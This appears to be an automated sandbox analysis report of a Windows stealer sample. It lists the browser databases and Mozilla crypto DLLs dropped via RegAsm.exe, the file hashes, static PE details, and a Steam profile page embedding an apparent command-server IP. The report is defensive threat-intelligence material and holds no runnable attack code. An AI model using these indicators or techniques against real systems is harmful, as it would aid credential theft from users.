                                                                                  SSDEEP:192:qnaRt+YbBp6ihj4qyaaX86KKkfGNBw8DJSl:yegqumcwQ0
                                                                                  MD5:5D8E5D85E880FB2D153275FCBE9DA6E5
                                                                                  SHA1:72332A8A92B77A8B1E3AA00893D73FC2704B0D13
                                                                                  SHA-256:50490DC0D0A953FA7D5E06105FE9676CDB9B49C399688068541B19DD911B90F9
                                                                                  SHA-512:57441B4CCBA58F557E08AAA0918D1F9AC36D0AF6F6EB3D3C561DA7953ED156E89857FFB829305F65D220AE1075BC825F131D732B589B5844C82CA90B53AAF4EE
                                                                                  Malicious:false
                                                                                  Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

                                                                                  C:\ProgramData\GHIJJEGDBFII\JEGHDA

                                                                                  Download File
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.1358696453229276
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\ProgramData\GHIJJEGDBFII\freebl3.dll

                                                                                  Download File
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):685392
                                                                                  Entropy (8bit):6.872871740790978
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                  MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                  SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                  SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                  SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Joe Sandbox View:
                                                                                  • Filename: HaxexQ5EjD.exe, Detection: malicious, Browse
                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                  • Filename: 40UAEu1Kpt.exe, Detection: malicious, Browse
                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                  • Filename: WcBJX1H1hg.exe, Detection: malicious, Browse
                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\ProgramData\GHIJJEGDBFII\mozglue.dll

                                                                                  Download File
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):608080
                                                                                  Entropy (8bit):6.833616094889818
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                  MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                  SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                  SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                  SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Joe Sandbox View:
                                                                                  • Filename: HaxexQ5EjD.exe, Detection: malicious, Browse
                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                  • Filename: 40UAEu1Kpt.exe, Detection: malicious, Browse
                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                  • Filename: WcBJX1H1hg.exe, Detection: malicious, Browse
                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\ProgramData\GHIJJEGDBFII\msvcp140.dll

                                                                                  Download File
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):450024
                                                                                  Entropy (8bit):6.673992339875127
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                  MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                  SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                  SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                  SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

                                                                                  C:\ProgramData\GHIJJEGDBFII\nss3.dll

                                                                                  Download File
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):2046288
                                                                                  Entropy (8bit):6.787733948558952
                                                                                  Encrypted:false
                                                                                  SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                  MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                  SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                  SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                  SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\ProgramData\GHIJJEGDBFII\softokn3.dll

                                                                                  Download File
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):257872
                                                                                  Entropy (8bit):6.727482641240852
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                  MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                  SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                  SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                  SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\ProgramData\GHIJJEGDBFII\vcruntime140.dll

                                                                                  Download File
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):80880
                                                                                  Entropy (8bit):6.920480786566406
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                  MD5:A37EE36B536409056A86F50E67777DD7
                                                                                  SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                  SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                  SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\76561199686524322[1].htm

                                                                                  Download File
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3041), with CRLF, LF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):35643
                                                                                  Entropy (8bit):5.382912586977827
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:s7pqLtWYmwt5D0gqVUiNGAZPzzgiJmDzJtxvrfukPco1AUmPzzgiJmDzJtxvJ2SC:s78LtWYmwt5D0gqVUcZPzzgiJmDzJtxW
                                                                                  MD5:7BCE059CFD60B798CB45C3F4C80B9F6C
                                                                                  SHA1:736FAB76D920E9A5E4BAB9E12E8C85C9D4B22A06
                                                                                  SHA-256:317AB49AEA660F5D325951C5EF280A54F6192D3B31A15B0F985EA292ED159980
                                                                                  SHA-512:B0875CD2B58367D1165D373600CE208B63C4E435A62C237729BB66645A43FC5A6DF16CC646553F97700FA5A7E4C3A5EEE4C7591D7A29E8F87662B815E8A56756
                                                                                  Malicious:false
                                                                                  Preview:<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: r8p- https://95.217.240.101|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=2VoZa2M8Wh3k&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/css/globalv2.c

                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqlx[1].dll

                                                                                  Download File
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):2459136
                                                                                  Entropy (8bit):6.052474106868353
                                                                                  Encrypted:false
                                                                                  SSDEEP:49152:WHoJ9zGioiMjW2RrL9B8SSpiCH7cuez9A:WHoJBGqabRnj8JY/9
                                                                                  MD5:90E744829865D57082A7F452EDC90DE5
                                                                                  SHA1:833B178775F39675FA4E55EAB1032353514E1052
                                                                                  SHA-256:036A57102385D7F0D7B2DEACF932C1C372AE30D924365B7A88F8A26657DD7550
                                                                                  SHA-512:0A2D112FF7CB806A74F5EC17FE097D28107BB497D6ED5AD28EA47E6795434BA903CDB49AAF97A9A99C08CD0411F1969CAD93031246DC107C26606A898E570323
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........7.Z.Y.Z.Y.Z.Y...Z.n.Y...\..Y...]...Y...X.Y.Y.Z.X..Y.O.\.E.Y.O.].U.Y.O.Z.L.Y.l3].[.Y.l3Y.[.Y.l3..[.Y.l3[.[.Y.RichZ.Y.................PE..L...i.`e...........!...%.. .........{D........ ...............................%...........@...........................#..6....$.(.....$.......................$.....`.#.8...........................x.#.@.............$..............................text...G. ....... ................. ..`.rdata...".... ..$.... .............@..@.data...4|... $..b....#.............@....idata........$......^$.............@..@.00cfg........$......p$.............@..@.rsrc.........$......r$.............@..@.reloc..5.....$.......$.............@..B................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll

                                                                                  Download File
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):685392
                                                                                  Entropy (8bit):6.872871740790978
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                  MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                  SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                  SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                  SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll

                                                                                  Download File
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):608080
                                                                                  Entropy (8bit):6.833616094889818
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                  MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                  SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                  SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                  SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll

                                                                                  Download File
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):450024
                                                                                  Entropy (8bit):6.673992339875127
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                  MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                  SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                  SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                  SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll

                                                                                  Download File
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):2046288
                                                                                  Entropy (8bit):6.787733948558952
                                                                                  Encrypted:false
                                                                                  SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                  MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                  SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                  SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                  SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll

                                                                                  Download File
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):257872
                                                                                  Entropy (8bit):6.727482641240852
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                  MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                  SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                  SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                  SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll

                                                                                  Download File
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):80880
                                                                                  Entropy (8bit):6.920480786566406
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                  MD5:A37EE36B536409056A86F50E67777DD7
                                                                                  SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                  SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                  SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                  Static File Info

                                                                                  General

                                                                                  File type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                  Entropy (8bit):7.529756734354945
                                                                                  TrID:
                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                  File name:file.exe
                                                                                  File size:382'976 bytes
                                                                                  MD5:b580ff2d001291bf58bdd23a058ef21b
                                                                                  SHA1:5013dc6e38bd9d1cbe2f7fc0d983b6812f3f2351
                                                                                  SHA256:80994b791b545ba6a8c906e046ab6ae79c5875a4f42da07085113b4b6f22f8ca
                                                                                  SHA512:85643ff028ffa0d7c6e7b3dd69c9316aed5e6c15c364bfdb14ec65ca9859ee8fb2ae04e3990c2275671da27abb727a9505f2acf5453a4bb1a3f4df0664df603b
                                                                                  SSDEEP:6144:3hp+scz0+j/2LXudxnOqC3dFxYkBY8EdltIPaiTeUkHjUP6PiLNwETfeuBMbxFr9:3SscQu/CLtF3BY87PFi7HJAwETfhMlF5
                                                                                  TLSH:6684E051B4C1C032D433153A49F4DBB85E7EB9600AA69A9FBB940F7F4F312C1D621A6B
                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3UT.w4:.w4:.w4:..F9.{4:..F?..4:..F>.b4:...>.e4:...9.b4:..F;.~4:.w4;..4:...?.!4:...3.v4:...8.v4:.Richw4:.................PE..L..

                                                                                  File Icon

                                                                                  Icon Hash:90cececece8e8eb0

                                                                                  Static PE Info

                                                                                  General

                                                                                  Entrypoint:0x4072d9
                                                                                  Entrypoint Section:.text
                                                                                  Digitally signed:false
                                                                                  Imagebase:0x400000
                                                                                  Subsystem:windows cui
                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                  Time Stamp:0x6644F62C [Wed May 15 17:51:40 2024 UTC]
                                                                                  TLS Callbacks:
                                                                                  CLR (.Net) Version:
                                                                                  OS Version Major:6
                                                                                  OS Version Minor:0
                                                                                  File Version Major:6
                                                                                  File Version Minor:0
                                                                                  Subsystem Version Major:6
                                                                                  Subsystem Version Minor:0
                                                                                  Import Hash:81b834f6f9db0b945bd836f537996a1f

                                                                                  Entrypoint Preview

                                                                                  Instruction
                                                                                  call 00007F13E0BBF083h
                                                                                  jmp 00007F13E0BBE759h
                                                                                  push ebp
                                                                                  mov ebp, esp
                                                                                  mov eax, dword ptr [ebp+08h]
                                                                                  push esi
                                                                                  mov ecx, dword ptr [eax+3Ch]
                                                                                  add ecx, eax
                                                                                  movzx eax, word ptr [ecx+14h]
                                                                                  lea edx, dword ptr [ecx+18h]
                                                                                  add edx, eax
                                                                                  movzx eax, word ptr [ecx+06h]
                                                                                  imul esi, eax, 28h
                                                                                  add esi, edx
                                                                                  cmp edx, esi
                                                                                  je 00007F13E0BBE8FBh
                                                                                  mov ecx, dword ptr [ebp+0Ch]
                                                                                  cmp ecx, dword ptr [edx+0Ch]
